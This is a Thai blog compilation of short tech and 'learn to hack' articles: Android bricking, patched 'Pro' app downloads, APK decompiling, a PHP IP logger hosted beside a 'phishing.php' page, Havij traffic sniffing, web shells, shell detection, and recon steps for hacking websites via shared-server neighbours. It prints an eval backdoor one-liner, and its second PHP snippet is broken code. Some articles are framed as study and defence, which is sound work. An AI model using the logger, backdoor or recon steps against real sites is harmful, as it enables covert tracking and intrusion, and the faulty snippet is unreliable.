บทความต่างๆ

✡ หากพบลิ้งค์เสีย ดาวน์โหลดไม่ได้ ไฟล์ Version เก่า รบกวนช่วยกรุณาแจ้งผู้ดูแล ขอบคุณครับ ✡
อาการ Brick (บริค) หรืออาการ เครื่องมีปัญหาทางด้านซอฟต์แวร์ทั้งหลาย พูดง่ายๆ ว่าหากอาการหนักนั้น ก็เป็นเพียงก้อนหินทับหนังสือเท่านั้น
ซึ่งซอฟต์แวร์ที่ผิดพลาดไม่สามารถควบคุมการปฎิบัติการได้ มีหลายรูปแบบ เช่นการแฟลชรอมผ่าน PC แล้วไฟตก , แฟลชไม่ผ่าน , หรือติดปัญหาอื่นๆ
มาดูกันว่ามือถือ Brick นั้น แบ่งเป็นอะไรบ้าง

1. Brick แบบเบาๆ (Solf Brick)
 เกิดจากตัว kernel หรือ bootloader ไม่สัมพันธ์กัน  อีกอย่างก็คือมือถือไม่สามารถโหลด framework ของรอมได้
อาการคือจะค้างอยู่ที่หน้า bootanimation หรือ บูทวน แต่สามารถเข้า recovery และ download mode ของเครื่องได้

-  อีกอย่างคือ อาจจะเกิดข้อผิดพลาดต่างๆเกี่ยวกับ partition
เปิดเครื่องได้ แต่เข้า recovery mode ไม่ได้
เข้าได้แต่ download mode หรือแฟลชรอมโดยใช้โปรแกรมผ่าน PC แล้วไม่ผ่าน มีหลายระยะ อาการ แต่จำพวกนี้อยู่ในบริกแบบแก้ไขได้
(แต่หากแก้ไขไม่ถูกวิธี งานเข้านะครัช )


2. Dead Brick เปิดเครื่องไม่ได้ เสียบสายชาร์ตไม่เข้า สามารถแก้ไขได้โดยการปั้มหัวใจมือถือนั่นเอง โดย USB jig (อาการเริ่มรุ่นแรง)
หากแก้ไขต้องมีความชำนาญสูง
3. hard brick บริคแบบหนักมากๆ
จะไม่สามารถเปิดเครื่องได้  เสียบที่ชาทแบตก็ไม่ขึ้นชาท หน้าจอมืดสนิท มีโอกาสส่งศูนย์สูงที่สุดเป็นการดีมาก

ปล. การแฟลชรอม หรือการปรับแต่งต่างๆ ต้องศึกษาดีพอสมควรเพราะมือถือสมัยนี้ ทำออกมาเพื่อป้องกันการปรับแต่งมากมาย
บางรุ่นบางยี่ห้อ ถึงกับเข้าถึงยากมาก ต้องมีซอฟต์แวร์ที่ทำขึ้นเพื่อปลดล็อก ถึงจะทำการปรับแต่งได้
แต่หากเป็นมือถือที่เปิดให้ทำการปรับแต่งโดยไม่มีซอฟต์แวร์คอยกันไว้ ก็ง่ายดาย แต่ !!! ต้องระวัง
การแฟลช Rom , Kernal , Bootloader หรือไฟล์ซอฟต์แวร์ต่างๆ อาจเกิดข้อผิดพลาดได้เสมอ การ Root รวมถึงการเปลี่ยนตัวอักษรก็อาจเกิดข้อผิดพลาดได้เช่นกัน

อาการ Brick (บริค) คืออะไร

By : Mönster Bĸĸ
6/09/2559

APK EDITOR



APK Editor เป็นเครื่องมือที่มีความสามารถดัดแปลงแก้ไขไฟล์นามสกุล .apk
สามารถเปิดและเข้าถึงฐานข้อมูลด้านในของไฟล์ .apk
ความสามารถของ APK Editor หลากหลาย
แต่ที่ใช้หลักๆก็คือ ใช้เปลี่ยนชื่อแอพ ใช้ Clone ไฟล์.apk
ทั้งหมดนี้ ก็ขึ้นอยู่ที่ว่าคุณจะใช้งานมันอย่างไร


Download






หมายเหตุ V3.1.0 เป็นคนละตัวกับ Main และ Patch

รูปตัวอย่างวิธีการติดตั้ง Application ที่มีนามสกุล .apk ขั้นพื้นฐาน




วิธีการติดตั้ง Application ที่มีนามสกุล .apk ขั้นพื้นฐาน


1. เข้าไป ตั้งค่า

2. ระบบป้องกัน

3. เลื่อนหา "แหล่งที่ไม่รู้จัก"

4. ติ๊กถูกที่ "แหล่งที่ไม่รู้จัก"

5. หลังจากติ๊กถูกจะมีข้อความเด้งเตือนขึ้นมาให้กดตกลง

6. เสร็จแลวออกจากจุดนี้ได้เลยแล้วติดตั้งตามปกติ

วิธีการติดตั้งตัว Main และ Patch


1. ติดตั้ง APK Editro Pro (Main) ตามขั้นตอน

2. เปิด APK Editro Pro (Main) แล้วกดปุ่ม Home พับโปรแกรมลงไป

3. ติดตั้ง APK Editro Pro (Patch) ตามขั้นตอน

4. เปิด APK Editro Pro (Patch) แล้วกดปุ่ม Home พับโปรแกรมลงไป

5. ทำการ Restart เครื่อง 1 รอบ

โปรแกรม APK Editor Pro

By : Mönster Bĸĸ

BusyBox


Busybox คือ โปรแกรมที่รวมชุดคำสั่งของ Unix 
ใช้เพื่อสั่งงาน Linux kernel ให้ทำงานทั่วๆไป 
เช่น จัดการไฟล์, ปิดโปรเซส เป็นต้น 
และเนื่องจาก Android ก็พัฒนามาจาก Linux 
ทำให้นักพัฒนาโปรแกรม Android นิยมใช้ Busybox 
เพื่อรองรับการทำงานต่างๆของตัวโปรแกรมด้วย 
ตัวอย่างโปรแกรมที่ต้องการ Busybox เช่น Titanium Backup

Download

โปรแกรม Busybox Pro V 2.8

By : Mönster Bĸĸ


สวัสดีครับวันนี้ผมจะมาสอนวิธีการแปลงไฟล์จากไฟล์ *.apk ซึ่งเป็นไฟล์ที่ Compile แล้ว
( พร้อมติดตั้งไปยังอุปกรณ์ระบบปฏิบัติการแอนดรอยด์ ) ไปเป็นไฟล์ source code กันครับ


เริ่มแรกเลยสิ่งที่ต้องมีคือ

ไฟล์ *.apk ที่เราจะแปลง (วิธีดาวน์โหลดไฟล์จาก Google Play Store)
dex2jar สำรอง dex2jar-0.0.9.15.zip
Java Runtime Environment (ติดตั้งจาวา ค้นหาคำว่า install java jdk ใน Google เอานะมีเยอะ)

คราวนี้มาถึงวิธีการแปลงไฟล์กันครับ

1. ทำการเปลี่ยนนามสกุลไฟล์ .apk เป็น .zip 

:: วิธีการเปลี่ยนเครื่องบางคนอาจจะไม่ได้ตั้งค่าให้ Rename นามสกุลไว้ ดังนั้นจะต้องเข้าไปตั้งค่าที่

Window XP
เปิด Mycom > Tool > Folder Option > View > Hide extensions known file type (เอาติ๊กถูกออก)

Window 7
เปิด Mycom > Organize > Folder and search options > View > Hide extensions known file type (เอาติ๊กถูกออก)

:: เมื่อทำการตั้งค่าแล้ว เวลาเราคลิกขวา ที่ไฟล์ ก็จะสามารถเปลี่ยนนามสกุลได้แล้วครับ

2. เมื่อทำการเปลี่ยนนามสกุลไฟล์จาก .apk เป็น .zip แล้ว ทำการ Extract ไฟล์โดยคลิกขวาที่ ไฟล์นามสกุล .zip

3. ไฟล์ที่เป็นตัว source code คือ classes.dex จากนั้นให้ทำการดาวน์โหลดไฟล์ dex2jar 
ซึ่งไฟล์นี้จะทำหน้าที่ในการแปลง *.dex  เป็น *.jar

4. ต่อมาให้ทำการ  copy ไฟล์ classes.dex ไปไว้ในไดเร็กทอรี่เดียวกันกับ dex2jar.sh 
(ถ้าเป็นระบบปฏิบัติการ Windows ให้ใช้ dex2jar.bat )  เปิด Terminal หรือ Command Prompt (สำหรับ Windows OS)


แล้วใช้คำสั่งเปลี่ยนไดเร็กทอรี่ cd ไปยังไดเร็กทอรี่ที่เก็บไฟล์ dex2jar.sh 
ใช้คำสั่ง ./dex2jar.sh classes.dex สำหรับ Linux OS หรือ Mac OS
ใช้คำสั่ง dex2jar.bat classes.dex สำหรับ Windows OS

5. จากนั้นสังเกตุในไดเร็กทอรี่ครับ จะได้ไฟล์ classes_dex2jar.jar เพิ่มมา 

6. จากนั้นทำการเปิดโปรแกรม jd-gui (Java Decompile) 

7. เปิดไฟล์ classes_dex2jar.jar ที่ได้จากการแปลง ก็จะเห็น code ด้านใน

เสร็จสิ้นการ Decompile android apk file to java source code (แปลงไฟล์ *.apk เป็น java code)

Decompile .APK File

By : Mönster Bĸĸ

ดัก IP HACK IP จริงแล้วเขาทำกันยังไง PHP IP LOG
PHP IP LOG เพื่อการศึกษาเท่านั้นครับตอบโจทย์ให้คนที่สงสัยเรื่อง การ HACK IP , การดัก IP

สมัยก่อนที่ยังมี MSN เรื่อง HACK IP จะเป็นที่สนใจมาก 
โดยเฉพาะ  IP GET ส่วนเสริมของ MSN PLUS หรือไม่ว่าจะเป็นการใช้ NETSTAT 
ในตอนส่งไฟล์ ในปัจจุบันก็ยังมี FACEBOOK ที่เรียกว่าเป็น SOCIAL NETWORK 
ที่มีความเสี่ยงในเรื่อง PHP IP LOG ด้วย ทีนี้เรามาดูโค้ดกันชัดๆ 
ตอบโจทย์ให้คนที่สงสัยเรื่องการแฮก IP , การดัก IP


สิ่งที่ต้องทำความรู้จัก

- โฮสฟรี-
ในที่นี้ขอแนะนำของ 000webhost
สำหรับอัพไฟล์ .php และ log.txt ขึ้นระบบ

เมื่อสมัครขอใช้โฮสฟรีแล้วเราจะเข้าเว็บได้ตามลิงค์ URL ของเว็บตามชื่อที่ตั้งไว้
webname.xxxxx.com

โดยอยู่ในรูปแบบ Sub Domain
แนะนำสำหรับคนเริ่มต้นอีกทีเมื่อเราเข้าไปส่วนจัดการไฟล์
และทำการอัพโหลดไฟล์ทั้ง 3 ขึ้นระบบแล้วจะได้ URL ดังนี้

www.webname.xxxxx.com/login.php
www.webname.xxxxx.com/phishing.php
www.webname.xxxxx.com/log.txt

ต่อมาเรามาดูโค้ดการทำงานของ Code PHP  ที่ใช้เก็บค่า IP ในแบบพื้นฐาน
เมื่อมีคนเปิดหน้านั้นก็จะถูกเก็บค่า IP และค่าอื่นๆไว้
เพื่อให้มองเห็นภาพทีละบรรทัดสำหรับคนที่อยากศึกษา


[CODE]
<?php
$file = 'log.txt'; 
$ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
$fp = fopen($file, 'a'); 
fwrite($fp, $ipaddress); 
fclose($fp);
?>

// อธิบายโค้ด //
$file = 'log.txt';
$file จะเป็นตัวกำหนด Logfile ที่จะใช้เก็บค่า IP

ขั้นแรกเราสามารถใช้  $ _SERVER ['REMOTE_ADDR']
เก็บ IP ของผู้ใช้งานที่เข้ามาในหน้านั้น
และอย่าลืม  \r\n เพื่อผลลัพธ์ที่ออกมาใน log  ออกมาเป็นบรรทัด
$ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";

$fp=fopen($file, 'a'); 
กำหนดตัวแปร $fp ให้เป็นการเปิดไฟล์ที่กำหนดชื่อในตัวแปรของ $file
โดยกำหนดโหมด 'a' คือการเปิดเพื่อเขียนต่อท้าย
และจะสร้างไฟล์ขึ้นใหม่ถ้าไม่มีไฟล์

และเขียนข้อมูลจาก $ipaddress ลงในไฟล์ด้วย fwrite($fp, $ipaddress);
ในกรณีที่ใช้ fopen ให้ใช้  fclose ปิดท้าย
เพื่อมันใจว่า IP ได้ถูกเขียนลงใน LOG



นอกจากนี้เรายังเก็บค่าอื่นๆเพิ่มได้อีกเช่น  

$date = date('d/F/Y h:i:s');

เก็บค่าวันที่เข้าชม
 ข้อมูล Browser ของผู้เข้าชม

$browser = $_SERVER['HTTP_USER_AGENT'];

[CODE]

<?php
$file = 'log.txt'; 
$ipaddress = $_SERVER['REMOTE_ADDR'];
$date = date('d/F/Y h:i:s');
$browser = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen($file, 'a'); 
$fwrite($fp, $ipaddress.' '.$date.' '.$browser"\r\n"); 
fclose($fp);
?>

HACK IP จริงแล้วเขาทำกันยังไง?

By : Mönster Bĸĸ

อยากเป็น Hacker - แฮกเกอร์ ต้องทำอย่างไร ?


อธิบายเกี่ยวกับ HACKER - แฮกเกอร์

สอนแฮกเกอร์ =  สอนให้รู้จักการแฮก ที่แท้จริงของแฮกเกอร์
และประยุกค์นำไปใช้ในทางที่ดี  ดีกว่าอ่อน SECURITY จนโดนเขาแฮก
เว็บนี้เกิดจากการใช้แนวคิดในแง่มุมตอนที่ผมเริ่มหัดเรียนรู้ในด้านนี้ใหม่ๆ (แฮกเกอร์) เป็นการเรียนรู้ด้วยตัวเอง และเดินไปในทางที่ผิดพลาด
(ผมเสียเวลากับการเรียนรู้ที่ผิดพลาดมานานกว่า 5  ปี)
ค้นหาแต่เพียงเครื่องมือที่นำมาซึ่งความสบาย

แต่ภายในเราไม่รู้อะไรเกี่ยวกับมันอย่างลึกซึ้งเลย
จากคนที่มีความคิดในทางลบ  จึงอยากดึงคนที่สนใจ แฮกเกอร์เหล่านี้
เพื่อปรับเปลี่ยนแนวคิด ในคำว่า แฮก
ของคนกลุ่มนี้ให้ไปทางที่เกิดประโยชน์ต่อไป

การสนใจ "แฮกเกอร์" ไม่ผิด
แต่บางครั้งการศึกษาแบบไม่มีผู้แนะนำนั้น
ทำให้ผู้เริ่มต้นใหม่ๆอาจสนใจผิดในสิ่งที่ผิดได้
เช่นการเปิด Google : ค้นหา โปรแกรมแฮกเฟสบุ๊ค , โปรแกรมแฮก...ลฯล
ถือเป็นการเสียเวลา,ไม่ได้ความรู้ แถมอาจได้ไวรัส ,ถูกขโมยข้อมูลได้แบบไม่รู้ตัว

แล้วจะเป็น "แฮกเกอร์" ควรจะอ่านเรื่องอะไร
ถ้าผมเจอคำถามนี้ ผมมักจะตอบกลับไปว่า...
คุณมีอะไรอยู่ในมือ ?
กับ ทำอะไรแล้วมีความสุข  ?

ความรู้ประเภทไหนที่มันเข้าหัวได้เรื่อยๆ โดยที่คุณไม่รู้สึกรำคาญ
นั่นแหละครับคือสิ่งที่คุณต้องพยายาม ทำมันให้เต็มที่

เพราะในที่สุดแล้วต่อให้คุณพยามเรียนรู้
โดยตั้งเป้าไว้ที่คำว่า HACK เพียงคำเดียว
คำตอบนั้นกว้างมาก..ผลลัพธ์ที่ออกมาก็คือความท้อแท้
จนทำให้คุณรู้สึกเบื่อ จนเลิกที่จะเรียนรู้ไปเลยก็ได้

คำถามข้างบนนี้ จะให้คำตอบได้ว่า
คุณควรจะเป็น หรือ จะเป็นอะไรได้บ้าง ?
ตอบคำถามตัวเองแล้วเริ่มศึกษากับสิ่งนั้นอย่างจริงจัง...



สิ่งที่ควรสนใจในเส้นทางของ แฮกเกอร์ นั้น
หลักๆจะมี 4 สายวิชาให้เลือกศึกษาคือ


[1] Programing
สายนี้ สำหรับคนชอบการเขียนโปรแกรม เพื่อใช้งานกับคอมพ์พิวเตอร์
หรืออาจจะรวมไปถึงการเขียน Mobile Application เพื่อใช้งานบนมือถือด้วย ลฯล
ซึ่งแฮกเกอร์ส่วนมากก็ต้องศึกษาโค้ดกันด้วย....เพื่อเข้าใจกับการทำงานของโปรแกรม

ยกตัวอย่าง การที่จะแฮกเว็บ ซักเว็บหนึ่ง ก็ต้องเรียนรู้ภาษาของเว็บ
และเรียนรู้การใช้งานของระบบจัดการฐานข้อมูลของเว็บๆนั้นด้วย ลฯล
หรืออีกด้านคือการเขียนเพื่อใช้งานเอง ซึ่งสายนี้ก็มักจะเรียนรู้คู่กับการ Reverse Engineering

[2] Reverse Engineering
สำหรับคนที่ชอบโปรแกรมเมอร์ก็สามารถเรียนรู้ในเรื่อง Reverse Engineering ได้
เพราะกลุ่มนี้จะยุ่งอยู่กับโค้ดเหมือนๆกัน เช่น ทำการ Crack โปรแกรมแก้ไขไฟล์ของโปรแกรมนั้นๆให้สามารถใช้งานได้โดยไม่จำกัดเวลา
หรือ เปิดฟังชั่น ของโปรแกรมฟรี หรือจะเป็นการทำ Decompiler
เพื่อดู Source Code ของโปรแกรม   ลฯล

[3] Forensics
สำหรับคนที่ชอบแนว นักสืบ ที่จะทำเกี่ยวกับ
การตรวจสอบ การเก็บหลักฐาน, การค้นหา, วิเคราะห์
และการนำเสนอหลักฐานทางดิจิตอล เช่น การตามจับ HACKER

[4] Pentester
คือกลุ่มแฮกเกอร์ที่ทำการทดสอบเจาะระบบต่างๆ
แยกออกหลักๆ 3 ประเภทดังนี้

Web Application Penetration Testing
การทดสอบความปลอดภัยของเว็บไซต์ หรือพูดง่ายๆคือการ ทดสอบแฮกเว็บ
แฮกเกอร์กลุ่มนี้อย่างน้อยๆจะต้องมีความรู้ในเรื่องภาษาที่ใช้เขียนเว็บไซต์
และการใช้งานระบบจัดการฐานข้อมูล คำสั่งในด้าน Os Command
ของเว็บไซต์ ที่ทำการทดสอบ ลฯล  ภาษาที่แนะนำเพื่อเริ่มต้นคือ PHP & Mysql
และทำการ Vulnerability Assessment เพื่อประเมิณความอันตรายของช่องโหว่นั้นๆ

Client-Side Penetration Testing
คือกลุ่มแฮกเกอร์ ที่ชอบทดสอบแฮก USER หรือแฮกผู้ใช้คอมพ์ทั่วไป
โดยอาศัย ช่องโหว่ของ Software,Web browsers, Media players  ลฯล

Network Penetration Testing
เป็นการโจมตีที่กว้างมาก (อธิบายไม่หมด)
เริ่มตั้งแต่การทดสอบจากเครือข่ายภายใน LAN , WLAN , MAN , WAN
แนะนำให้ศึกษา OSI 7 Layer และ TCP/IP สำหรับการเริ่มต้น

อธิบายคำว่า "Security"
ตีความหมายออกมาให้เห็นภาพ ?

HACK = HACK
(ไม่ต้องรู้อะไรมาก รู้แค่วิธีการแฮกแค่นั้น)

SECURITY
เน้นการเรียนรู้หลักการทำงานของช่องโหว่
เพื่อป้องกันระบบของตนเองให้รอดพ้นจากแฮกเกอร์
รวมถึงสามารถป้องกันได้ (อย่างถูกวิธี)

สุดท้ายการเป็น  JubChai แปลเป็นไทยคือ "จับฉ่าย"
อาจจะไม่ใช่กลุ่มจำพวกคนที่มั่วซั่ว แต่อาจจะหมายถึงคนที่ศึกษามันซะทุกอย่าง
จนสามารถไปต่อได้ในทุกๆด้าน และการนำความรู้เหล่านี้มาปรับใช้เข้าด้วยกันได้
(แต่ก็มีทางลึกของตัวเองอยู่เพียงหนึ่ง) คือที่มาของคำว่า "แฮกเกอร์"
 ฝากถึง "แฮกเกอร์" หรือเด็กมหาลัยชาว it ทุกคนที่สนใจ
ความพยามในการเรียนรู้สำคัญมาก
เชื่อว่าหลายๆคนอ่านมาถึงจุดนี้แล้วเพราะความสนใจจริง
แต่ในทางปฏิบัติ ผมขอตั้งคำถามไว้ว่า
ถ้าคุณเปิดเจอเนื้อหาที่อ่านแล้วไม่เข้าใจ
คุณจะยอมเสียเวลานั่งเซิส Google กันมั้ยครับ ?

ถ้ายอม = การเรียนรู้ก็ไปต่อ = บทความนี้เป็นผลสำเร็จ
ถ้าไม่....การเรียนรู้ก็จบลงแค่นั้น...
ความฝันอยากเป็น "Hacker" ก็ยังเลือนลางต่อไป

นอกซะจากการขอคำแนะนำจากผู้รู้ที่รู้จัก หรือใช้การเรียนรู้ที่เร็วคือการถาม
แต่ในวงการ HACK ถ้าไม่สนิทจริงคงไม่มีใครสอนกันง่ายๆแน่นอน

ท้ายสุด.....การเรียนรู้ด้วยตัวเอง (แสวงหา)

ฝึกเป็นนักแปล การฝึกแปล สำคัญมาก
ถึงแม้เด็กๆรุ่นหลังมีมากที่ไม่ชอบการเรียนรู้ภาษา
แต่เหตุผลที่ต้องแปลเพราะบทความในไทย
อาจไม่มีไอเดียร์ที่ดี ให้อ่านกันมากเท่าไหร่
เปิดเจอบทความ ภาษาอังกฤษ ที่น่าสนใจให้ลุยได้เลยครับ
เพราะชีวิตคือการเรียนรู้ เราจึงต้องแสวงหา และเรียนรู้กันต่อไป

"เรียนรู้ > เข้าใจ > ใช้ จินตนาการ สร้างไอเดีย"

"Hacker" อยากเป็น Hacker - แฮกเกอร์ ต้องทำอย่างไร?

By : Mönster Bĸĸ

Sniffer ดูการทำงานของ"โปรแกรมแฮก"อย่าง Havij
เทคนิคการ SNIFF เพื่อดูการทำงานของโปรแกรมแฮก ที่กำลังแพร่หลายที่ชื่อว่า "HAVIJ"


Havij ถือเป็น Sql injection tool (โปรแกรมแฮก)ตัวหนึ่งที่
(ผมขอใช้คำว่า Script kiddie) หรือมือใหม่ที่เพิ่งหัดแฮก + ยังไม่มีความรู้ใดใดมากมาย
นิยมใช้งานกันอย่างแพร่หลายในไทย และก็ทราบเป็นที่แน่นอนว่า 
"มันไม่ได้เกิดประโยชน์อะไรให้แก่ตัวเราเลยซักนิดเดียว"

วันนี้จะขอมาแนะนำวิธีการ Sniffer เพื่อที่จะสามารถ
แกะและดูวิธีการทำงานการส่งโค้ดและชุดคำสั่งเพื่อทำ sql injection ของตัวโปรแกรมนี้กันครับ
เพื่ออ่านการทำงานของคำสั่งและศึกษาได้ว่า โปรแกรมแฮกนี้ติดต่อและทำอะไร ?

STEP 1  Download & Install

STEP 2  Open Wireshark
เปิด Wireshark เลือกแถบ Interface หรือ Interface List
และติ๊กเครื่องหมายถูกในช่องของ Device ที่มีการรับส่ง Packet วิ่ง 
หรือเป็น Interfaces ที่ใช้งานปัจจุบัน เสร็จแล้วกด Start เพื่อทำการ Sniff รอไว้ได้เลยครับ

STEP 3  Open Havij
และทำการ Attack site หรือใช้โจมตีไปยัง URL Parameter 
ที่มีช่้องโหว่ Sql injection [แนะนำให้ทำบน localhost เพื่อความปลอดภัยครับ ]

STEP 4
เปิด Wireshark ที่เรา Sniff ทิ้งไว้ขึ้นมาแล้วกด Stop ครับ
ในช่อง Filter : ให้เราใส่คำว่า http เพื่อเลือกดูเฉพาะ http protocol เท่านั้นครับ
จะง่ายต่อการ สังเกตุในช่อง Info เราจะเห็นลิงค์ URL ยาวๆที่ต่อท้ายด้วย union+all+select
ให้คลิกขวา เลือก Copy > Summary (Text) และนำไปวางใน Hack bar
เพื่อทำการ Decode URL ออกมาเป็นที่เรียบร้อย ตาม VDO Clip ด้านล่างครับ



Havij

By : Mönster Bĸĸ

มือใหม่หัดแฮก "Shell คืออะไร"
SHELL คือ? สำหรับคนที่กำลังเริ่มต้นคงยังไม่ได้ทำความรู้จักกับเจ้า SHELL / หอย

ซึ่งเป็นสิ่งหนึ่งที่สำคัญมากในการแฮก SERVER , HOST , WEB ลฯล รวมไปถึงการแฮกเซิฟเวอร์เกมส์เถื่อนด้วยเหมือนกัน

ในบทความนี้จึงขออธิบายในศัพท์ของคนทั่วๆ ไป
ให้เข้าใจและหาทางป้องกันกันต่อไปครับ

Shell คือ? ...สรุปเป็นภาษาบ้านๆเพื่อไม่ให้เข้าใจยาก
มันก็คือไฟล์ php ที่เราสามารถ สั่งใช้งาน อาธิเช่น
อัพโหลดไฟล์ขึ้น ,โหลดไฟล์ , ดูโค้ด , แก้ไข , ลบไฟล์ ,สร้างไฟล์  ลฯล
รวมไปถึงการเชื่อมต่อเข้า Mysql เพื่อ Dump ข้อมูล
หรือพูดง่ายๆว่า ขโมยข้อมูล ดีดีนั่นแหละครับ


 เมื่อเจ้า shell ขึ้นไปอยู่บนเว็บของใครผู้โชคร้าย
ผู้ใช้งาน shell ก็จะมองเห็นไฟล์ทั้งหมดบนโฮสนั้น
(รวมถึงไฟล์อย่าง Config.php ที่เก็บพาสเวิร์ดสำหรับเชื่อมต่อ Mysql ด้วยเช่นกัน)

Shell ที่นิยมใช้กันทั่วไปจะมีชื่อว่า   C99.php  และ R57.php หาโหลด ได้ตาม google ทั่วไป
(แต่ 99% มีของแถมยัดมาให้ด้วยแน่นอน...)
 (ส่วนมาก) โดนฝังโค้ดอันตราย *เว็บไหนไม่เคยโดนแฮก
แต่ดันเอา Shell ไปขึ้นเว็บไว้ก็อาจโดนตามมาจากเจ้าของ Shell หรือ Hacker คนอื่นๆ
ได้เหมือนกันครับ..เพราะฉนั้นแล้วอย่าหาโหลดมาใช้กันมั่วๆเน้อออ

 (หากอัพขึ้นเว็บจริงๆแล้วชื่อไฟล์จะถูกเปลี่ยนแปลงไปตามความต้องการของ Hacker)
ซึ่งมุขหลักๆเลยก็คือจะเปลี่ยนชื่อหอยให้เนียนคล้ายๆกับไฟล์เดิมที่มีอยู่บนเว็บของเราครับ

[ตัวอย่าง C99 ของจริง]

What is this Shell "Shell" คืออะไร?

By : Mönster Bĸĸ

ตรวจสอบเว็บโดนแฮก - การสร้างประตูหลังของแฮกเกอร์
จะทำอย่างไรเมื่อ เว็บถูกแฮกและจะทำอย่างไรให้รู้ว่า เว็บโดนแฮก
การสร้างประตูหลังของแฮกเกอร์ในการแฮกเว็บและการตรวจสอบ

ปลอดภัยจากการแฮกเว็บ,ถูกแฮก
แฮกเกอร์ แฮกเว็บจากทางไหน...ในการตรวจสอบเว็บไซต์เราโดนแฮกจากทางไหน...ท่าทางจะเป็นไปได้ยากถ้าหากไม่รู้ก่อนว่าถูกแฮกแล้วเราจะรู้ได้อย่างไรว่าเว็บเรา "โดนแฮก" เข้าให้แล้ว...การตรวจสอบดู LOG  ก็เป็น 1 วิธี แต่จะแนะนำ ณ.ที่นี้ เป็นขั้นตอนที่ 2 หลังจากทราบว่าถูกแฮก
เป้าหมายของแฮกเกอร์
เป้าหมายของ แฮกเกอร์ทุกคนหวังในความสำเร็จในการแฮกเว็บ แต่ละเว็บ
คือการวาง Shell  ซึ่งที่ใช้กันแพร่หลาย ได้แก่  c99.php  r57.php (c99 คืออะไร >>C99.php<<)
และอาจเปลี่ยนชื่อไฟล์ไปต่างๆนานา เพื่อความเนียน และตรวจสอบได้ยากของ Admin


บทความนี้จึงกล่าวถึงการตรวจสอบ ไฟล์ Shell
ที่ใช้ในการแฮกเว็บของแฮกเกอร์ว่ามีใครแฮกเข้ามาบ้าง

ตรวจสอบเบื้องต้น


1.วันที่ / ปีที่ ทำการอัพโหลด
แอดมินสามารถตรวจสอบเป็นประจำว่า ไฟล์ในเว็บเรานั้น อยู่ในปี พศ. อะไร
ตรงนี้จะตรวจสอบง่ายมาก ถ้ามีไฟล์ที่อัพโหลดใน พศ. ใหม่  ซึ่งไม่ใช่ ฝีมือของเราแน่นอน
2.ไฟล์ .php ทุกไฟล์
 ส่วนนี้ถ้าไฟล์ในเว็บไม่เยอะมากจะง่ายมากตรงนี้ ให้เราสังเกตุไฟล์ php
จากชื่อไฟล์...  แฮกเกอร์ อาจอัพโหลดไฟล์มาในชื่อ c99.php , r57.php โดยตรง
หรือมุข ที่ใช้กันแพร่หลาย  คือการเนียน ชื่อไฟล์ให้เหมือนกับไฟล์ในระบบ
เช่นไฟล์บนเว็บของคุณมี member.php hacker อาจอัพโหลดไฟล์ Shell  ขึ้นมาในชื่อ members.php
บางทีแฮกเกอร์อาจใช้เทคนิคคาดไม่ถึงอย่าง
http://basic-hack.blogspot.com/2014/05/shell-php.html


+ เมื่อพบ Shell ในระบบ +

ขอแนะนำให้ Admin ตรวจสอบ Log หาที่มา โดยใช้ชื่อไฟล์ Shell
เป็นตัวนำทาง  ตรวจสอบ ว่า User คนไหนในเว็บ  หรือ ip ไหนที่ทำการ อัพโหลดไฟล์นี้ขึ้นมา...
และตรวจสอบขั้นที่สอง  ว่า USER คนนี้ หรือ IP นี้ อัพโหลด SHELL นี้มาจากทางไหน
และเพื่อความละเอียดยิ่งขึ้น  ดูให้หมด ว่า  นาย USER หรือ ip  ของ hacker นี้
ได้เดินทางในเว็บของเราไปที่ไหนบ้าง
จนทราบถึงของการถูกแฮกของเว็บไซค์

เกร็ดความรู้
Shell บนระบบที่ hacker อัพโหลดขึ้นมาได้นั้น...
ไม่ได้มีเพียง 1 ไฟล์ แน่นอน
และบางไฟล์ไม่สามารถเข้าถึงได้เนื่องจาก hacker อาจตั้งรหัสผ่านไว้
หรืออาจมาในรูปแบบ <?eval
<? eval($_SERVER['HTTP_BASICHACK']);  ?>


หน้าตาของ C99.php และ R57.php  คร่าวๆ



My WEB has been Hacked. เว็บโดนแฮก?

By : Mönster Bĸĸ

Step Hack website - ขั้นตอนของการแฮกเว็บหนึ่งเว็บ
ขั้นตอนของการ HACK WEBSITE แบบ STEP BY STEP 
เพื่อเป็นแนวทางสำหรับการศึกษาและหาทางป้องกันโดนแฮกกันต่อไปครับ

สำหรับผู้ที่อยากทราบว่าทำไมเว็บโดนแฮก ?
ก่อนจะ โดนแฮกเว็บ 

จะผ่าน วิธีการขั้นตอนใดใดบ้าง แบบคร่าวๆ
ก่อนอื่นอ่านบทความตามลิงค์ ก่อนที่จะ
เริ่ม Hacker เพื่อความเข้าใจที่ตรงกัน


ขั้นที่ 1 ping web เพื่อหา ip ของเว็บ

ทำไมต้อง Ping Web ก่อนจะแฮก ต้องเช็ค IP ของเว็บก่อน เพื่อทำการสืบค้นข้อมูลต่อไป

*excample
[Start > Run > พิม cmd แล้ว enter > พิม ping ชื่อเว็บ]  และ Enter


ขั้นที่ 2 Reverse ip

เมื่อหา IP ได้แล้ว นำ IP ที่ได้ไป Reverse IP เพื่อหา Website อื่นๆ ที่อยู่บน Server เดียวกัน
และเก็บเป็น Website Target list (เว็บเป้าหมาย)

ถาม :ทำไมต้องตรวจสอบเว็บอื่นบน Server
ตอบ :เว็บเป้าหมายหากตรวจสอบแล้วแฮกเกอร์ไม่สามารถ แฮก เข้าไปได้ เป้าหมายต่อไป
จะเป็นเพื่อนร่วม Server จะถูกแฮกเข้าไปฝัง Shell และมีโอกาสที่สามารถเข้าไป
ยังเว็บไซต์เป้าหมายหลักได้เช่นกัน

ดังนั้น สรุปได้ว่า หากเว็บไซต์ที่มั่นใจในด้านความปลอดภัย แต่ยังตั้งอยู่บนเครื่อง Server
ที่ให้บริการส่วนรวมมีเว็บอื่นๆรวมอยู่ด้วย ความปลอดภัยก็ยิ่งลดน้อยลง

ขั้นที่ 4 หา Exploit

ในที่นี้ข้อให้ความหมายของคำว่า Exploit หมายถึง  รายงานช่องโหว่ หรือบัคที่แฮกเกอร์ตรวจสอบพบ
บน CMS หรือยกตัวอย่างง่ายๆเช่น เว็บบอร์ด smf เวอร์ชั่น 1.1 หรือ ปลั๊กอิน เวอร์ชั่นต่างๆ
และได้ทำการแจ้งต่อผู้ดูแลระบบ และนำมาเผยแพร่
แฮกเกอร์มือใหม่จึงมักใช้วิธีนี้ก่อน (เพราะไม่ต้องออกแรงหาช่องโหว่ของเว็บไซต์เอง)

สำหรับโปรแกรมที่ใช้ตรวจสอบส่วนเสริมของระบบ CMS ที่คนนิยมใช้
